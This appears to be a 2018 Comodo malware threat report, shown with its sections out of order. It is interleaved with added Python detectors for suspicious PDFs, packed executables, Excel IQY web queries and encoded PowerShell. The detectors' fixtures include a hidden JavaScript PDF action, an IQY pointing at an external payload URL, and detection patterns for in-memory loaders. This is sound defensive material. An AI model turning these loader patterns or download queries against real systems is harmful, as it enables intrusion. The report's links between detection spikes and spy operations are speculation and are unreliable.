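def normalize_names(data: bytes) -> bytes:
    """Resolve #xx escapes so obfuscated names compare equal to plain ones."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_risky_names(data: bytes) -> dict:
    """Count each risky name in already-visible (uncompressed) bytes."""
    hits = {}
    for m in RISKY_RE.finditer(normalize_names(data)):
        key = m.group(1).decode()
        hits[key] = hits.get(key, 0) + 1
    return hits


def inflated_streams(data: bytes):
    """Yield the inflated content of every FlateDecode stream; others are skipped."""
    for m in STREAM_RE.finditer(data):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # not zlib data (image, font, ...) or corrupt: nothing to read


def triage_pdf(data: bytes) -> dict:
    """Flag a PDF for analyst review when action-capable names appear either in
    plain view or inside compressed streams."""
    if not data.lstrip().startswith(b"%PDF-"):
        raise ValueError("missing %PDF- header")
    visible = count_risky_names(data)
    hidden = {}
    for blob in inflated_streams(data):
        for key, n in count_risky_names(blob).items():
            hidden[key] = hidden.get(key, 0) + n
    return {"visible": visible, "in_compressed_streams": hidden,
            "needs_review": bool(visible or hidden)}


# Constructed samples (not real documents). The suspicious one carries an
# OpenAction pointing at a hex-escaped JavaScript action plus a second action
# hidden in a Flate-compressed stream; the benign one is a bare one-page file.
SAMPLE_BENIGN = b"".join([
    b"%PDF-1.4\n",
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n",
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n",
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n",
    b"trailer << /Root 1 0 R >>\n%%EOF\n",
])
_HIDDEN_ACTION = zlib.compress(b"<< /S /JavaScript /JS (app.alert(2)) >>")
SAMPLE_SUSPICIOUS = b"".join([
    b"%PDF-1.4\n",
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n",
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n",
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n",
    b"4 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj\n",
    b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(_HIDDEN_ACTION),
    _HIDDEN_ACTION, b"\nendstream\nendobj\n",
    b"trailer << /Root 1 0 R >>\n%%EOF\n",
])

if __name__ == "__main__":
    print(triage_pdf(SAMPLE_BENIGN))
    print(triage_pdf(SAMPLE_SUSPICIOUS))
```

A positive result means "open this in a sandbox or a real PDF parser", not "malicious": legitimate forms use /AcroForm and /JS too. What the example demonstrates is the two places a grep-style check goes wrong, hex-escaped names and compressed object streams, and it is deliberately blind to object streams (/ObjStm) and encrypted documents, which need a full parser.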


5.3 Medium Threat Malware. In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor. Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers. Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
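Two things give a packed executable away on disk: the section names a stock packer leaves behind, and the near-random byte distribution of compressed or encrypted code. The script below is an added example, not Comodo's tooling or part of the report. It walks the PE headers by hand (MZ, e_lfanew, PE signature, COFF header, section table), reports sections whose names match the UPX family and sections whose Shannon entropy approaches 8 bits per byte, and treats either as "likely packed". The section-name set and the 7.0 entropy threshold are this example's assumptions; the three PE images are constructed inline by a small builder and are not real files.

```python
import math
import random
import struct

# Section names that stock UPX (and MUPX builds derived from it) leave in the
# section table. Assumption for this example: a packer can rename them freely,
# which is why the entropy check below exists as a second signal.
PACKER_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".UPX0", b".UPX1"}
ENTROPY_THRESHOLD = 7.0  # bits/byte; compressed or encrypted data sits near 8.0
MIN_SECTION_BYTES = 256  # tiny sections give meaningless entropy figures


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table and
    yield (name, raw_bytes) for every section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    for i in range(num_sections):
        hdr = table + i * 40
        name = pe[hdr:hdr + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        yield name, pe[raw_ptr:raw_ptr + raw_size]


def assess_packing(pe: bytes) -> dict:
    """Report known packer section names and high-entropy sections; either one
    marks the file as likely packed and worth unpacking before static analysis."""
    names, known, hot = [], [], []
    for name, data in parse_sections(pe):
        label = name.decode("ascii", "replace")
        names.append(label)
        if name in PACKER_SECTION_NAMES:
            known.append(label)
        if len(data) >= MIN_SECTION_BYTES:
            ent = shannon_entropy(data)
            if ent >= ENTROPY_THRESHOLD:
                hot.append((label, round(ent, 2)))
    return {"sections": names, "known_packer_sections": known,
            "high_entropy_sections": hot, "likely_packed": bool(known or hot)}


def build_pe(sections) -> bytes:
    """Construct a minimal, non-executable PE image with the given (name, data)
    sections. Test fixture only: the optional header is zero-filled."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    headers_len = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    first_raw = (headers_len + 0x1FF) & ~0x1FF  # 512-byte file alignment
    table, body = b"", b""
    for name, data in sections:
        table += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(data), 0, len(data), first_raw + len(body), 0, 0, 0, 0, 0x60000020)
        body += data
    image = dos + b"PE\0\0" + coff + b"\0" * opt_size + table
    return image + b"\0" * (first_raw - len(image)) + body


# Constructed sample inputs (not real malware): a UPX-style layout, a packer that
# renamed its sections, and a plain unpacked layout.
_rng = random.Random(1337)
_HIGH_ENTROPY = bytes(_rng.getrandbits(8) for _ in range(4096))  # stands in for compressed code
_LOW_ENTROPY = b"\x90" * 2048 + bytes(range(256)) * 4              # stands in for ordinary code
SAMPLE_UPX = build_pe([(b"UPX0", b""), (b"UPX1", _HIGH_ENTROPY), (b".rsrc", b"\0" * 512)])
SAMPLE_RENAMED = build_pe([(b".text", _HIGH_ENTROPY), (b".data", b"Hello, world!\0" * 64)])
SAMPLE_PLAIN = build_pe([(b".text", _LOW_ENTROPY), (b".data", b"Hello, world!\0" * 64)])

if __name__ == "__main__":
    for label, sample in (("upx", SAMPLE_UPX), ("renamed", SAMPLE_RENAMED), ("plain", SAMPLE_PLAIN)):
        print(label, assess_packing(sample))
```

The second sample is the interesting one: its section table looks like any compiler's output, and only the entropy of .text shows that the "code" is really a compressed blob plus a stub. Legitimate installers and protected commercial software trip the same heuristic, so the result is a reason to unpack and look further, not a verdict.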

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder. Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools. Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes. "Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware: Applications. In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications. Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications. The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications. Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis. In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today, the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA. This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China. This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions. In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

Request a demo: try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361. Visit comodo.com.

North America: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394; sales@comodo.com

Europe: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

Asia: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800; www.comodo.co.in

© 2018 All Rights Reserved. Comodo Security Solutions, Inc.

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



And after that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning, because it infects computers by way of popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on a legitimate piece of software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As the diagram shows, Ammyy Admin was used in spreading many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is that these tricks are also based on using legitimate software, this time from Microsoft.


Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY file contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The malicious IQY file included a malicious URL, so opening it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.

Malware runs PowerShell
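To make the IQY mechanism concrete, here is an added example (Python; not code from the Comodo report and not a Comodo tool) that parses an IQY attachment the way a mail gateway or an endpoint policy could before Excel fetches anything, and flags queries that point outside an allowlist or at a payload-like target. The IQY layout assumed is the documented plain-text one (query type, version, URL, then Key=Value options); the allowlist hosts, the suspicious-suffix heuristic and both sample files are constructed for the demonstration.

```python
"""Added example: parse an Excel .iqy web-query file and decide whether the
query it describes should be allowed. Not from the Comodo report.

Assumed (documented) IQY layout: line 1 = query type ("WEB"), line 2 =
version ("1"), line 3 = URL, optional following lines = Key=Value options.
"""
from urllib.parse import urlparse

# Hosts that internal spreadsheets are expected to query (constructed).
ALLOWED_HOSTS = {"intranet.example.internal", "reports.example.internal"}

# Extensions that are unusual as Excel web-query targets (heuristic, constructed).
SUSPICIOUS_SUFFIXES = (".exe", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".dat")


def parse_iqy(text):
    """Return {'type', 'version', 'url', 'options'}; raise ValueError if malformed."""
    lines = [line.strip() for line in text.splitlines()]
    while lines and not lines[-1]:          # ignore trailing blank lines
        lines.pop()
    if len(lines) < 3:
        raise ValueError("too short to be an IQY file")
    options = {}
    for line in lines[3:]:
        key, sep, value = line.partition("=")
        if sep:                             # skip blank lines and lines without '='
            options[key.strip()] = value.strip()
    return {"type": lines[0].upper(), "version": lines[1], "url": lines[2], "options": options}


def assess_iqy(text):
    """Return ('allow' | 'block', [reasons]) for one IQY file body."""
    try:
        iqy = parse_iqy(text)
    except ValueError as exc:
        return "block", [str(exc)]
    reasons = []
    if iqy["type"] != "WEB":
        reasons.append(f"unexpected query type {iqy['type']!r}")
    url = urlparse(iqy["url"])
    host = (url.hostname or "").lower()
    if url.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {url.scheme!r}")
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host {host!r} is not on the allowlist")
    if url.path.lower().endswith(SUSPICIOUS_SUFFIXES):
        reasons.append(f"query target {url.path!r} looks like a payload, not a data page")
    return ("block" if reasons else "allow"), reasons


# Constructed samples: an internal reporting query, and a query to an
# arbitrary external host (TEST-NET address) for a .dat file.
BENIGN_IQY = (
    "WEB\n1\nhttps://reports.example.internal/sales.html\n\n"
    "Selection=AllTables\nFormatting=None\n"
)
SUSPICIOUS_IQY = "WEB\n1\nhttp://203.0.113.10/1.dat\n"

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_IQY), ("suspicious", SUSPICIOUS_IQY)):
        verdict, reasons = assess_iqy(body)
        print(f"{name}: {verdict} {reasons}")
```

The allowlist is the important control: Excel will happily follow any URL an IQY names, so the decision has to be made on the query's destination before the file is opened, not on the attachment's extension alone.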


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and the manipulation of users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases, attacks can only be discovered too late, after money is withdrawn from a bank account or confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antivirus software.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in line with the new trends above. Combining the best malware detection tools with methods of protecting data built on defense-in-depth principles provides the most promising solution.

Chart data for 2.4, The growth of Flawed Ammyy attacks for Q2 (monthly values): Apr 43,188; May 46,382; Jun 48,881.


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: after all, cryptominers did not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antivirus software to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.

BadShell at work
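The decoding step described above is something a defender can automate. The following is an added example (Python; not code from the report and not a Comodo tool) that takes the command line of a scheduled-task action, pulls out the -EncodedCommand argument, decodes it the way PowerShell does (Base64 over UTF-16LE text) and scores the result for the traits the report attributes to BadShell: reading a registry value, turning Base64 back into bytes, and loading the result in memory. The indicator regexes, the two-indicator threshold and both sample command lines are constructed; the sample "malicious" script is an inert stand-in that only names the cmdlets and carries no payload.

```python
"""Added example: decode and triage -EncodedCommand arguments of scheduled-task
actions. Not from the Comodo report; indicators and samples are constructed."""
import base64
import binascii
import re

# PowerShell accepts unambiguous prefixes of -EncodedCommand; cover the usual spellings.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]+)", re.I)

# Traits the report attributes to BadShell, as regexes over the decoded script
# plus the outer command line (constructed indicator set).
INDICATORS = {
    "registry_read": re.compile(r"Get-ItemProperty|HKCU:|HKLM:|Registry::", re.I),
    "base64_payload": re.compile(r"FromBase64String", re.I),
    "in_memory_load": re.compile(r"Reflection\.Assembly\]::Load|Invoke-Expression|\bIEX\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def encode_ps(script):
    """Encode a script the way -EncodedCommand expects: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Inverse of encode_ps; return None if the text is not a valid encoded command."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_task_action(cmdline):
    """Return {'decoded', 'indicators', 'verdict'} for one task action command line."""
    match = ENCODED_FLAG.search(cmdline)
    decoded = decode_encoded_command(match.group(1)) if match else None
    haystack = cmdline + "\n" + (decoded or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if len(hits) >= 2:
        verdict = "suspicious"       # several BadShell-like traits together
    elif decoded is not None:
        verdict = "encoded"          # encoded but nothing specific; worth a look
    else:
        verdict = "clear"
    return {"decoded": decoded, "indicators": hits, "verdict": verdict}


# Constructed task actions. The second mimics the BadShell pattern with an inert
# script: it names the registry read and in-memory load, but carries no payload.
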